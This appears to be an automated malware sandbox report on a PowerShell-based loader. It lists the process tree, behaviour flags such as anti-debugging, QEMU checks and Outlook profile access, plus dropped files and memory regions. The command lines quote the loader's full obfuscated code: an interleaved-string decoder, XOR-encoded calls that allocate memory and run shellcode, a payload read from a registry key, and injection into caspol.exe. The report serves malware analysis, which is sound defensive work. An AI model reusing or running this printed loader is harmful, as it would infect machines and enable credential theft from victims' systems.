Di'Fo6Ic3Bi0Un0Uf2LiBLa2Be2Op2Bo3Sk3Bu4Ud6Me9Ji0Wh3Uk2Fa2Ko2Ex1Ac2MaEPa2ov9Te2Ex2Br0OvARe2Ge2Gr3Mi3La2UrFRe2Ki8wo2Sn3Is6MoFPr6Ti3Gt0Me4Aq2SeFwe3Tk5Ko2AfETe3ve4Em3Ma3Di2KlESe2Un6Su2No9Pa2Ab2Ha7Kr5Te6HaBWa6De7Pr6Au3Sy0In4Re2SiFGa3Co5Wr2RoEIn3Ba4Ma3Be3Ba2moEPe2Af6Sp2Ru9Ov2Fi2Su7Ha4Po6ImBom6Sk7Co6Gu3Bi2LiEUr2Be9Ui3Ea4Ro2Fl6Dk2ChBBu3Fe2Un2Ex5No3So5ta2CoEDa2In8Sh3Un2Fa3Ma4Pi2DeBOv3UnESh6FeBun6Af7Se6Ma3Ga0Lu8Pr3in7Pl3Wo4Sa3Le3Cr2DrELa2MaBMo2DeBSt2In2Am2Sl3He2Sa2Af3Im4Da6BoEBr6Pa9Ra1th4Si2Wi2Ju3Sa3De0MiECo2TeAGa3Ac7Sl2CeBPi2Be2Pe2AgAto2Ca2No2ta9Wa3Ac3Be2Un6Op3eg3Un2AlEAn2St8Gr2Sn9Kr0Em1qu2KnBun2Di6Re2Kr0Fi3Al4Bu6MiFSi6An3Om0Ts9Re2Al8Le2SkENa3re4Ac2Tu2Te7Le6Ko7Me5Ho7Mo1Un7Ho0Ob6SkEMo'Su;ju&Me(ga`$DiCEnhAgrgeiFisPrtGuiTeaUnnTeeFl7Hi)Sk Un`$NoEPrvDuaUtnKagsteAflUniVisuntBuaGerQuiTiuSamSc4Aa;De`$MaEThvInaUnnSagArestlKaiSesintRaaHirFoiReuOnmFo5Ur Al=Ge SlHSlTEmBPu Un'Te3Qu5St2Pa2Ma3ni3Am3Ki2Br3Ir5Gi2Ov9Ex6Ma7Zs6li3Cy0Ev0To2HaBOp2Un2Cy2Tr3An3Ho4Ry6De9Rh0Re4Ok3In5Pa2St2Sh2Rn6Uk3Go3Mo2Bi2Pr1Tr3Tr3MoETy3Sp7Tw2ak2Fu6YeFAr6SkETr'Fo;pe&Ud(An`$RoCSahSerPiicosBatSaiMoaScnDheve7zo)Sy Fu`$UnEAtvTraWanCogKieBolReiPrsHatDeaFlrBaiDouKomDa5Ko Pu Pl Ad;gr}ti`$IsgInrStnMatSteLytBe Co=An OdHSnTDvBCo Ov'Ov2FiCTo2Cy2Su3Am5Po2Pl9Oo2Fo2ma2IrBBi7No4Ac7Fl5Te'Br;St`$SuELivSuaFrnBrgMeeChlOpiSesKotSeaAlrGiiSauVemLo6Me Ar=Pe DiHUfTKoBCa Ef'Ru6Ti3Fe1Er3Un3Ag5Al2Ph6Pt2Be9Bl3Li4Re3St7In2Ps6Ta3An5Re2Ar2Fo2bo9un3Sm3sa2Il2Kv3Kh5Un6Ep7Ln7foADa6Ka7Un1LeCOv1Fo4Za3siEFo3sh4Fe3Ce3Ma2St2Pr2BeAFe6Vi9Ir1Cr5Ra3Ba2Ly2Sy9De3pr3Se2PaEPi2UrAGl2Ov2Re6Ge9Co0MiETh2La9Ge3Sc3Vo2Am2Sp3Un5Sc2Ca8Ly3St7Pa1So4Ci2Sk2Co3Se5Be3Sk1Un2PsESu2Sn4Vi2bi2He3Ma4Ur6Er9Su0BeAEn2Pu6Bt3Br5Zo3Ak4si2LoFBl2Kj6ki2TiBUl1ExAOr7RyDBa7EkDEf0Un0Ud2Br2Ab3Ya3br0Ob3Fr2Ci2Ch2IsBDi2Sl2Sl2Th0Ri2En6ac3Cl3Ko2Ty2In0Le1Ta2Di8Sk3Bo5Ma0Te1De3Gr2In2Sk9nd2Br4Re3Ej3Ta2LoEMu2Pr8Mo2Ga9Ki1Ek7Me2Di8Br2MiEbi2Ad9Ka3Sp3En2Hi2Pr3Ex5Cy6CaFTj6BaFAn2Po1Mi2MiCHy3Da7Ri6Of7Un6Pa3Ji2St0op3El5Ti2fo9St3Re3Fr2Ki2Re3br3En6Fa7Br6Be3Wi0Re4Fo2TrFHj3Hv5Ku2OvEab3Pi4An3Ha3Ku2ToECr2ci6Kl2Un9Fe2Af2Er7Be3Se6InEpi6PeBMa6La7Tr6SpFEf0Tu0rh0Sp3Si1mu3Na6Mi7Am0Ko7Tt6SaFOv1UnCSo0LeEUn2Pr9Di3Id3Pl1Ta7Fo3Di3Ti3Ku5Ba1PhANo6JoBIn6Un7bu1NoCpr1st2Un0MaEKo2nd9To3Fa3Op7Ha4Tj7Ja5He1MsABl6FrBRe6St7Ud1ArCre1Un2Ad0FlEAt2Al9Ko3Be3Tr7Mo4Sc7Ca5Al1TwAMa6UdBst6Un7Fi1FrCDa1No2Ri0maEUn2Le9St3Di3Ov7Fo4fr7Pe5Ka1ShAIn6EcEHe6Un7Em6OxFCa1AtCko0PrECo2Ba9No3Re3Ca1Hv7Sa3re3Tv3ga5De1LeAPl6CuETo6FeEPr6HaELa'Ne;re&Fe(Mi`$FoCBahMarRuiArsZytCoiMaaRhnHjehk7Hj)Ts Pr`$PjESivlbaPrnMigOxeKllHaiDosTetreaSkrAniDauDymSk6Mo;ex`$AkLOroBexProUndSaoUnnUdtHa Op=tu SufWikPopAf Lo`$udCArhSprHoiUisHvtEkiUnaNonKeeCo5Af fo`$thCPuhDyrsuitesprtIniQuaMenSteEu6Ve;Je`$UnEFovFoaAcnGagSoeWalPaiTisIstCeaKaraniKouBomSv7Pe St=Fe SnHArTBuBid Af'Sy6No3Ti2Sp2ra3Sm2Hn3So5st3FrEBi2Vo4Se2TrFTr2Kn8Kn3An5In2GoEKv2Fr4At7Op4Sy6Li7Ti7toAAr6Sl7Ne6Mi3Ps1Em3Fo3Ne5in2Pr6Ov2Le9Se3Rh4St3Sp7At2Ca6Re3Af5Jt2tr2Fo2Po9Tr3Un3Ba2Pr2Je3En5Li6Me9Pe0BeESy2In9Fi3An1Ba2Ba8As2TeCDe2Ex2In6UnFHj1SeCRi0TrECe2Je9Ai3Me3Ac1re7en3Mi3Ro3Ad5Uk1BrASl7SoDUn7HvDpo1ReDMo2Cm2La3Gy5Ba2Oo8El6PeBEf6Po7Ka7Pa1Sy7Br2Ti7Pr6Ai6TiBTo6Sp7Ac7No7Ge3InFCo7So4To7Fy7Ma7Va7Po7Mo7Cr6SaBBi6Ho7In7se7kn3ChFGl7Po3Be7Un7Cr6PrECe'Ha;Be&Fl(Bl`$arCCohCrrOpiPysNotApiEmaStnCieSl7Si)Us Pr`$PrEPbvKnaAbnOugOmeAdlChiHosMatDiaSnrKoiSeuCamVa7Vi;no`$ObESpvNiaAlnDigVieUdlCoiCosShtOpaEvrVaiUnuKomLa8Me Af=Er FoHDrTPiBPr Gl'Po6Mi3Ba0Xa9Be2Ud2Pr3In2Fo3Ka5An2At6Ba3Id4Ud3Ci3Ta2LeFSe2re2Gu2Hj9Io2AnEba2le4Ry3Dr4Kn6Fa7Pr7BrAFi6Ju7Ug6Pl3Am1Em3Fu3Li5Ac2Di6Un2Rm9Sy3Au4Pr3fe7Ni2Co6Mo3Sc5Ka2Sa2Re2Fo9De3Pa3Ha2Hy2sn3Fl5Da6Ru9St0PmESu2Di9su3Ha1Co2Sa8De2FoCVs2Ls2Me6SpFRe1SuCOr0TiECo2Ti9Vr3My3Sv1Ge7pr3Be3Gr3Ha5Mu1ReASv7StDSt7SrDAr1HyDKo2Bu2In3Lu5Fu2Pi8Pr6ReBPr6Pe7hv7Ud6Ca7Jo7gr7No7Ke7Bo2Tl7ToEPr7Fr0Hu7Di0An7Pr1Ka6ToBov6Ta7Sl7Pe7Pa3BoFZo7Ve4Pa7Fa7Be7Sp7Re7Ic7Ka6DiBCr6Ov7ma7Sw7Un3HaFSh7fi3Su6miEMi'Fe;St&Os(Dr`$NoCLehHorHaiSosUstHyiPlaUtnOaeFl7Tv)Ko Ka`$LiEInvTjaUsnChgPeeMelSpiNosMatSpaKvreniSauMamPr8Sw;Be`$GrAExzSsiRumUdiKonCooDybExeSenmazAsestnOmeUn=Ra(MiGBoeTatSl-NeIFutareCymOuPHarbloKopsteskrKatNeyHo ha-StPunaCetAnhCa Ex'OuHSkKBoCSkULi:Wh\StTAuoAgmmieSynIntCy\TufProPrrMuvdaiOmkMolFoiRenCegBeeTarPonPaean'Do)St.CaSLihBriPobOvbQuoGelFoeUdtShtHeeTurPanHleBysCo;De`$LiESkvHjastnSpgPheGelFoidosBatChaSkrSaiReuStmCo9Va Bo=Du UnHinTErBTh Ch'Pa6Ro3Do0Ma2Bl3Im1As2Ru6Re2Rh9Mi2Ha0Jd2Be2Ge2seBLu2NeENe3La4ta3et3Re2Su6Ob3pa5Ch2skEGu3Ge2Hy2MeADk6Ka7Go7FeAte6An7Ia1OoCNy1Ti4Ki3fiEMi3Di4Sl3ny3No2St2Ri2BaASn6Ha9Sm0Kl4Sl2Pa8Mo2sc9Sp3Ra1Un2Fa2Gn3Vi5Sc3no3Wi1ClAuk7CoDTi7ToDBo0Bo1Fr3Fu5Sa2ra8Sv2FlAEk0te5Ru2He6Bu3So4Sa2Ma2Kr7Bg1Ad7sp3Fo1Ca4Th3Co3Sa3Fo5Re2MiEVo2Al9Ot2Pe0Pe6RoFPo6No3Be0Is6En3MyDSa2QuEUn2TaAAm2DiERe2Fl9Na2Ra8sa2Sk5Kv2Pi2Ty2Ep9Dy3OpDTv2Pr2Co2Ko9Ge2No2Ga6UnESe'Un;Va&Fo(Fl`$OsCTuhSerFoiHasArtbriBuaTynSkeIs7Ve)Tu Pr`$TuEAdvLuaDinTigSeeUnlDoiNisRitudaScrHuiFruMamPa9Sk;ta`$TrASozMiiStmFoiSenHioCabTieDrnStzMaeAmnSieLi0Su Iz=Dr ChHUrTekBSc bi'Fy1foCLs1Eu4sh3KeELa3Te4Fr3Ga3Ko2Fo2Su2SuADi6Ca9Be1Ud5Sa3mi2Sy2Di9Fi3Vr3Cl2UdEUr2ByAGa2Wa2tr6Bo9Cr0KnEMo2Me9Hy3Sc3Fr2Si2Sc3Un5Sn2Fa8Su3Ce7Cr1Po4Gy2Ud2Be3Ar5Vi3Fe1lg2SkETe2Da4Ta2Lu2ov3ge4Br6no9Ru0OlASt2We6Di3Hy5Ce3Po4Ru2AbFIn2In6bo2UnBWo1GiATa7MyDOv7CaDAt0Ca4Sp2Ek8Sl3Ma7Re3CoEFr6CoFli6Se3am0Po2Ra3Ci1Ba2Ba6Fa2Da9He2In0Fr2Tr2fo2FlBAl2VeETi3As4To3Ca3Mo2Is6Am3Sn5Ko2WrEBr3se2op2FrAOr6HoBSh6Me7De7So7Ru6foBCh6Ut7La6Ho7Ma6De3ju2To2Pa3Ne2Pr3In5Rv3UnEJe2Ki4No2ReFCo2Ra8Ra3Mo5ho2BiEsl2Un4Tr7pl4sk6PaBLa6Ba7Dd7Sa1bo7In2Ec7zi6Sk6CoEva'Kr;Me&un(Co`$VeCGuhRarRiiVasaltOriAsaalnFoeCh7Sy)Pa Be`$FoAAezNaiTemEsiBanInoSebEleManRezNoePenAleAm0Fa;De`$NoIRanAddKasDjeSanUddSltSieOl=Sk`$KaEPovZeaStnMagUneDrlBeiSospotUnaPrrLaiSturemUn.VecTjoAruAdnSotMi-St6Ba5Pu1En;Co`$TrAElzSeiBlmExiSenFooMubBlePrnNozToeSlnStekn1Go Sv=Rk SeHAlTSaBDa As'In1GuCTi1Fu4na3CoEEf3Af4Ti3Te3Ko2In2Ha2HiAOv6Ma9Ol1ej5Ka3Tr2Ko2Cr9Ta3Up3Li2BiEhe2PeAEs2El2Se6Fo9Kl0CoEOr2Un9Lo3Fl3ni2gl2St3Fo5Ha2Im8Tu3Fu7Un1Fl4Gl2Vi2Fu3Di5Sa3Ar1do2ToEud2An4Yo2At2Bl3Po4Ta6In9Pr0DuAAi2su6st3Fd5Re3Ha4Ud2geFhe2Bu6Da2stBCo1DeAHu7IsDSk7ZuDmo0Ox4An2Is8Se3Ex7Un3DiESu6InFHv6Fa3Ku0st2Va3Ch1Ba2By6Pa2Sa9So2Yo0Dy2Su2De2NoBfl2LoELa3In4In3St3Ex2Pa6Sl3La5Fa2PhEUn3Da2Vi2TrATs6DeBGe6An7Be7Dr1No7Ch2Ey7Ea6Ho6TeBSa6Li7Wr6so3Sk0Mi9Br2Fo2Do3Ss2Tr3So5Sy2ac6Op3Du4Pu3Ne3Lu2PrFBr2So2Pi2Tr9Fl2ViEAn2te4Se3Av4Me6UrBEx6Ry7Su6Rd3Co0BaEEn2Al9An2Ri3Co3Sp4Sq2Se2De2An9Ra2Gy3Un3Bl3Fo2re2Be6PoESk'Gr;Pa&Ef(Us`$BiCHahRarBliDrsprtKuiSaaSpnHaeMe7Ri)Di cl`$UmAPrzaristmFliPrnDdoMibKnetrnLazPaeMenLieTh1St;Gu`$LsADizCoiUdmBriBandeoSobIneSpnZozUneHanUpeKo2To ty=Th KrHStTOfBSp Af'La6Fo3Ch1Ur4Do2OrCAn3As5Fg3en2Pa2Di2Sk3kr4Ud3Pr3Bl2ClEEu2huCam3Ut4Un6Ka7Li7prAMu6Ma7Fa1coCCr1Di4Fo3foEMy3Be4Ka3Sn3Pr2Re2Ko2CaAGr6Re9Un1Fo5Br3ov2Br2Ge9Ho3Li3Ma2IdEBr2jeACo2De2Ri6St9Du0ceENa2in9Ai3Ki3So2En2En3In5im2Xe8Cy3In7Br1Be4kl2Ta2Ar3Ti5ae3Ca1Bl2HeEHu2Ne4Sp2Sk2Su3En4Cr6Ke9In0NgAFr2Gr6Ja3Hi5Pu3Pr4Ze2saFTi2Rk6He2SkBPr1GlAFo7SmDMa7NaDFo0In0Em2Sh2Wa3Bo3St0Hu3Bu2Sk2Ek2PaBCo2Ka2Op2Un0At2He6Sa3Po3Qu2Mi2Sp0Te1Pl2Sa8Tr3St5Li0Mo1Ph3Ov2un2Ch9ga2Ax4Lu3Me3No2InEEn2St8Re2Af9Ro1lo7Ta2Tr8Fl2FaEMi2Aa9In3Un3Or2Ny2Sk3Se5Sl6TeFSn6PoFpr2Sk1Br2HaCFr3Ra7In6gu7Pe6Su3Da0Be4Co2Di6Ud2Sc5Sp2snELg2Ho9Sy2Cl2vi3Sh3Af3Pe0Pa2Fa8Sp3Su5Sh2RaCEk3Ov4Kr6Ga7Fo6Ho3Cy0Kl0Mo2Pa2Un2Lb9Tr2Po1Ka2Yn8Af3Re5si3Ar3Ch2IrBDr2KoBRe2Pr2Ud6AnECa6FeBIs6Be7An6UnFMa0Ar0sl0Il3Gu1Un3Sk6Pa7St0Un7Ov6CoFMa1MoCUp0alEvi2Re9Kr3Up3Mu1Me7Ko3Fo3Tr3cu5Au1FdADr6SmBPr6Do7No1BiCTe0LoEVi2Co9Yi3Di3Ps1Mo7Fo3Ns3Si3De5bo1NoAKy6GrBli6St7Li1HyCFr0ReEBu2An9Gr3Re3sm1Mo7Pe3Ti3Lo3Kr5An1MiASe6BoBFa6Ch7ba1MoCUn0CoESt2Ac9Kr3rg3Di1Pr7At3Sa3Mi3Sn5Pr1giASe6BeBFl6Gr7Af1SpCko0enEPs2Ci9Ne3No3Ve1Re7Me3Ak3Da3Sa5Fa1PoAUn6GoECo6Co7Gl6ReFFo1FoCsk0LaETi2St9El3Po3hj1Po7Fe3Te3In3su5vi1RaAFl6IvEst6frETe6TrEMa'Di;gg&Ex(Fe`$ShCPahNerDoiBasEltaciElaEvnSueBa7Se)Fr Ha`$SrACozGeiKkmmaiGunSpoTibReeVenHezUnePanWieSc2no;pi`$BeABuzSniSpmDeiSnnFooSobFreAmnLyzbaeThnCreFe3La Al=Po ReHBlTShBDa In'Se6Bo3Ba1Sk4Se2GeCBl3Eu5Pr3Pl2re2Sd2Le3Ku4Kl3Bi3Fr2SeEAs2GaCRu3Ka4Un6Al9Sg0AfETa2An9In3Da1Or2Sa8In2InCNe2Rh2St6OnFFr6Ta3to2Pr2El3de2De3Er5Ca3MuEEr2Ja4Tr2UmFDa2Fr8De3Li5An2DeEPu2Sp4Di7Fo4St6WhBSt6Or3Te0An9pl2Va2Li3Ga2Pu3An5kr2Ov6Tr3Zo4Fo3Ha3Uh2CaFJe2Lu2Sl2mi9Co2NoEMi2Bo4Ba3La4He6FaBFr6To3Tr0JuBOp2Lu8Pi3HoFFo2Do8Ja2Fi3Ca2Pe8Me2Un9Br3Fa3Sa6KoBHv7En7Sk6UdBNe7Kj7Os6InEPr'Br;Fl&Su(Se`$SrCCahUdrPaiRusUntRiiCaaHunSoeDa7Za)Re Ra`$PeALezOuiFumViiFanCooKrbKoeUdnPozCheKanReeHa3Vi#Un;""";Function Aziminobenzene9 { param([String]$Berthed); For($pharaohs=2; $pharaohs -lt $Berthed.Length-1; $pharaohs+=(2+1)){ $Raafrugts = $Raafrugts + $Tyrannophobia + $Berthed.Substring($pharaohs, 1); } $Raafrugts;}$Limpidity0 = Aziminobenzene9 'DiIBoEReXSu ';$Limpidity1= Aziminobenzene9 $pretincture;if([IntPtr]::size -eq 8){START-job { param($gagmen) powershell $gagmen } -RunAs32 -Argument $Limpidity1 | wait-job | Receive-Job;}else{&$Limpidity0 $Limpidity1;};;;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Berthed); $Skydedrs = $Berthed.Length; $Recommending = New-Object byte[] ($Skydedrs / 2); For($pharaohs=0; $pharaohs -lt $Berthed.Length; $pharaohs+=2){ $Recommending[$pharaohs/2] = [convert]::ToByte($Berthed.Substring($pharaohs, 2), 16); $Recommending[$pharaohs/2] = ($Recommending[$pharaohs/2] -bxor 71); } [String][System.Text.Encoding]::ASCII.GetString($Recommending);}$Noise1260=HTB '143E3433222A69232B2B';$Noise1261=HTB '0A2E2435283428213369102E297475691229342621220926332E31220A22332F282334';$Noise1262=HTB '0022331735282406232335223434';$Noise1263=HTB '143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B22152221';$Noise1264=HTB '3433352E2920';$Noise1265=HTB '0022330A2823322B220F2629232B22';$Noise1266=HTB '1513143722242E262B09262A226B670F2E2322053E142E206B671732252B2E24';$Noise1267=HTB '153229332E2A226B670A262926202223';$Noise1268=HTB '1522212B222433222303222B2220263322';$Noise1269=HTB '0E290A222A28353E0A2823322B22';$Christiane0=HTB '0A3E03222B2220263322133E3722';$Christiane1=HTB '042B2634346B671732252B2E246B671422262B22236B670629342E042B2634346B6706323328042B263434';$Christiane2=HTB '0E2931282C22';$Christiane3=HTB '1732252B2E246B670F2E2322053E142E206B67092230142B28336B67112E353332262B';$Christiane4=HTB '112E353332262B062B2B2824';$Christiane5=HTB '2933232B2B';$Christiane6=HTB '093317352833222433112E353332262B0A222A28353E';$Christiane7=HTB '0E021F';$Christiane8=HTB '1B';$Cabinetworks=HTB '121402157475';$Genfortlle=HTB '04262B2B102E292328301735282406';function fkp {Param ($Tormentillen, $Robing) ;$Evangelistarium0 =HTB '63012B262A2A22342C3522337077677A676F1C06373703282A262E291A7D7D0432353522293303282A262E2969002233063434222A252B2E22346F6E673B67102F2235226A08252D222433673C67631869002B2825262B063434222A252B3E0426242F22676A062923676318690B282426332E28296914372B2E336F63042F352E34332E2629227F6E1C6A761A69023632262B346F6309282E3422767571776E673A6E69002233133E37226F6309282E3422767571766E';&($Christiane7) $Evangelistarium0;$Evangelistarium5 = HTB '63172626342C3E292322292322767573677A6763012B262A2A22342C3522337077690022330A22332F28236F6309282E3422767571756B671C133E37221C1A1A67076F6309282E3422767571746B676309282E3422767571736E6E';&($Christiane7) $Evangelistarium5;$Evangelistarium1 = HTB '3522333235296763172626342C3E292322292322767573690E2931282C226F6329322B2B6B67076F1C143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B221522211A6F0922306A08252D22243367143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B221522216F6F0922306A08252D222433670E29331733356E6B676F63012B262A2A22342C3522337077690022330A22332F28236F6309282E3422767571726E6E690E2931282C226F6329322B2B6B67076F631328352A2229332E2B2B22296E6E6E6E6B67631528252E29206E6E';&($Christiane7) $Evangelistarium1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Opstilledes,[Parameter(Position = 1)] [Type] $insalubriously = [Void]);$Evangelistarium2 = HTB '63002B222334677A671C06373703282A262E291A7D7D0432353522293303282A262E29690322212E2922033E29262A2E24063434222A252B3E6F6F0922306A08252D22243367143E3433222A691522212B2224332E282969063434222A252B3E09262A226F6309282E34227675717F6E6E6B671C143E3433222A691522212B2224332E282969022A2E3369063434222A252B3E05322E2B2322350624242234341A7D7D1532296E690322212E2922033E29262A2E240A2823322B226F6309282E34227675717E6B676321262B34226E690322212E2922133E37226F63042F352E34332E262922776B6763042F352E34332E262922766B671C143E3433222A690A322B332E2426343303222B22202633221A6E';&($Christiane7) $Evangelistarium2;$Evangelistarium3 = HTB '63002B222334690322212E292204282934333532243328356F6309282E3422767571716B671C143E3433222A691522212B2224332E28296904262B2B2E2920042829312229332E2829341A7D7D14332629232635236B6763083734332E2B2B222322346E691422330E2A372B222A22293326332E2829012B2620346F6309282E3422767571706E';&($Christiane7) $Evangelistarium3;$Evangelistarium4 = HTB '63002B222334690322212E29220A22332F28236F63042F352E34332E262922756B6763042F352E34332E262922746B67632E2934262B3225352E2832342B3E6B6763083734332E2B2B222322346E691422330E2A372B222A22293326332E2829012B2620346F6309282E3422767571706E';&($Christiane7) $Evangelistarium4;$Evangelistarium5 = HTB '3522333235296763002B22233469043522263322133E37226F6E';&($Christiane7) $Evangelistarium5 ;}$grntet = HTB '2C223529222B7475';$Evangelistarium6 = HTB '6313352629343726352229332235677A671C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D00223303222B222026332201283501322924332E282917282E293322356F6F212C3767632035293322336763042F352E34332E262922736E6B676F00031367076F1C0E29331733351A6B671C120E293374751A6B671C120E293374751A6B671C120E293374751A6E676F1C0E29331733351A6E6E6E';&($Christiane7) $Evangelistarium6;$Loxodont = fkp $Christiane5 $Christiane6;$Evangelistarium7 = HTB '632232353E242F28352E2474677A676313352629343726352229332235690E2931282C226F1C0E29331733351A7D7D1D2235286B677172766B67773F747777776B67773F73776E';&($Christiane7) $Evangelistarium7;$Evangelistarium8 = HTB '63092232352634332F22292E2434677A676313352629343726352229332235690E2931282C226F1C0E29331733351A7D7D1D2235286B67767777727E7070716B67773F747777776B67773F736E';&($Christiane7) $Evangelistarium8;$Aziminobenzene=(Get-ItemProperty -Path 'HKCU:\Toment\forviklingerne').Shibboletternes;$Evangelistarium9 = HTB '630231262920222B2E343326352E322A677A671C143E3433222A69042829312235331A7D7D0135282A0526342271731433352E29206F63063D2E2A2E29282522293D2229226E';&($Christiane7) $Evangelistarium9;$Aziminobenzene0 = HTB '1C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D0428373E6F630231262920222B2E343326352E322A6B67776B6767632232353E242F28352E24746B677172766E';&($Christiane7) $Aziminobenzene0;$Indsendte=$Evangelistarium.count-651;$Aziminobenzene1 = HTB '1C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D0428373E6F630231262920222B2E343326352E322A6B677172766B6763092232352634332F22292E24346B67630E29233422292333226E';&($Christiane7) $Aziminobenzene1;$Aziminobenzene2 = HTB '63142C35322234332E2C34677A671C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D00223303222B222026332201283501322924332E282917282E293322356F6F212C3767630426252E2922333028352C346763002229212835332B2B226E6B676F00031367076F1C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6E676F1C0E29331733351A6E6E6E';&($Christiane7) $Aziminobenzene2;$Aziminobenzene3 = HTB '63142C35322234332E2C34690E2931282C226F632232353E242F28352E24746B63092232352634332F22292E24346B630B283F28232829336B776B776E';&($Christiane7) $Aziminobenzene3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"5⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5502fd0dd8738615a14d50ddebdb678b7
SHA19c98797055a06f0f7018c0431089f82afc3aac85
SHA25608973b258288784201810c28c420160acf591429ac8c9cf9d879c5eafb19105d
SHA5120ba5051ee4f12d72a23926bcc6eb9999f309d0b27d353c21c2c67d5a07132c42ce5be0e53e835774c7c88dba70e1b8908dff9b384665c6d9385347602a6308ff
-
memory/528-88-0x0000000000401000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/528-95-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/528-93-0x0000000000620000-0x0000000000FB8000-memory.dmpFilesize
9.6MB
-
memory/528-94-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/528-78-0x0000000077200000-0x00000000773A9000-memory.dmpFilesize
1.7MB
-
memory/528-75-0x0000000000620000-0x0000000000FB8000-memory.dmpFilesize
9.6MB
-
memory/528-87-0x0000000000400000-0x0000000000615000-memory.dmpFilesize
2.1MB
-
memory/528-84-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/528-90-0x0000000000400000-0x0000000000430000-memory.dmpFilesize
192KB
-
memory/528-72-0x000000000039768E-mapping.dmp
-
memory/528-83-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/904-62-0x0000000076391000-0x0000000076393000-memory.dmpFilesize
8KB
-
memory/904-63-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/904-61-0x0000000000000000-mapping.dmp
-
memory/904-82-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1308-59-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/1308-55-0x0000000000000000-mapping.dmp
-
memory/1308-57-0x000007FEF3700000-0x000007FEF4123000-memory.dmpFilesize
10.1MB
-
memory/1308-76-0x00000000025E4000-0x00000000025E7000-memory.dmpFilesize
12KB
-
memory/1308-77-0x00000000025EB000-0x000000000260A000-memory.dmpFilesize
124KB
-
memory/1308-60-0x00000000025EB000-0x000000000260A000-memory.dmpFilesize
124KB
-
memory/1308-58-0x000007FEF2BA0000-0x000007FEF36FD000-memory.dmpFilesize
11.4MB
-
memory/1412-74-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/1412-85-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1412-86-0x0000000005C00000-0x0000000006598000-memory.dmpFilesize
9.6MB
-
memory/1412-73-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/1412-69-0x0000000077200000-0x00000000773A9000-memory.dmpFilesize
1.7MB
-
memory/1412-91-0x0000000005C00000-0x0000000006598000-memory.dmpFilesize
9.6MB
-
memory/1412-92-0x00000000773E0000-0x0000000077560000-memory.dmpFilesize
1.5MB
-
memory/1412-68-0x0000000005C00000-0x0000000006598000-memory.dmpFilesize
9.6MB
-
memory/1412-67-0x0000000073240000-0x00000000737EB000-memory.dmpFilesize
5.7MB
-
memory/1412-64-0x0000000000000000-mapping.dmp
-
memory/1728-54-0x000007FEFBA81000-0x000007FEFBA83000-memory.dmpFilesize
8KB